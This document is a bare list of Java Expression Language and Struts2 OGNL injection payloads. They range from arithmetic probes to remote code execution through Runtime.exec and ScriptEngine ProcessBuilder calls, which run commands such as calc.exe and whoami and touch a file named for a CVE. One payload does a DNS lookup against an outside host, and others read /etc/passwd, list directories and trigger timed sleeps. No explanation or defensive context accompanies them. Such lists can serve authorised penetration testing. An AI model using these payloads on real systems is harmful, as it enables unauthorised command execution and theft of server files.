#{empty}
#{class}
#{request}
#{java}
${“aaaa”}
${99999+1}
#{7+7}
${{7*7}}
#{ T(java.lang.Math).random() * 10.0}
${‘this is el vulnerability’.toUpperCase()}
${‘a’.concat(‘b’)}
${‘a’.getClass()}
“${‘a’.getClass().forName(‘sun.misc.Launcher’).newInstance()}
$\\A{‘’.getClass().forName(‘java.lang.Runtime’).getMethods()[6].invoke(null).exec(‘calc.exe’)}
${‘a’.getClass().forName(‘java.lang.Runtime’).newInstance().getEngineFactories()[0].exec(‘calc.exe’)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance()}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineFactories()[0].getLanguageName()}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”new java.lang.String(‘xxx’)\”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”new java.lang.ProcessBuilder[‘(java.lang.String[])’]([‘calc.exe’]).start()\”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”var x=new java.lang.ProcessBuilder; x.command(\\\”whoami\\\”); x.start()\”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”var x=new java.lang.ProcessBuilder; x.command(\\\”dir\\\”); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”var x=new java.lang.ProcessBuilder; x.command(\\\”ping\\\”,\\\”127.0.0.1\\\”); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘js’).eval(\”java.lang.Runtime.getRuntime().exec(\\\”calc.exe\\\”)\”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”java.lang.Runtime.getRuntime().exec(\\\”calc.exe\\\”)\”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”java.lang.Runtime.getRuntime().exec(\\\”cmd.exe /C start http://127.0.0.1:8000\\\")\")}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”var x=new java.lang.ProcessBuilder; x.command(\\\”whoami\\\”); x.start()\”)}
${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[‘(java.lang.String[])’]([‘/bin/sh’,’-c’,’nslookup jndi.s.artsploit.com’]).start()”)}
${‘a’.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(\”new java.lang.ProcessBuilder[‘(java.lang.String[])’]([‘calc.exe’]).start()\”)}
$\\A{‘’.getClass().forName(‘java.lang.Runtime’).getMethods()[6].invoke(null).exec(‘touch /tmp/cve-2020–10199’)}
gk6q${“zkz”.toString().replace(“k”, “x”)}doap2
PRE-${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#parameters.INJPARAM[0]),#kzxs.print(new java.lang.Integer(829+9)),#kzxs.close(),1?#xx:#request.toString}-POST
${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#kzxs=@java.lang.Thread@sleep(10000),1?#xx:#request.toString}
${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=new java.io.File(#parameters.INJPARAM[0]),#pppp=new java.io.FileInputStream(#wwww),#qqqq=new java.lang.Long(#wwww.length()),#tttt=new byte[#qqqq.intValue()],#llll=#pppp.read(#tttt),#pppp.close(),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(new java.lang.String(#tttt)),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=/etc/passwd
${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=new java.io.File(#parameters.INJPARAM[0]),#pppp=#wwww.listFiles(),#qqqq=@java.util.Arrays@toString(#pppp),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#qqqq),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=..
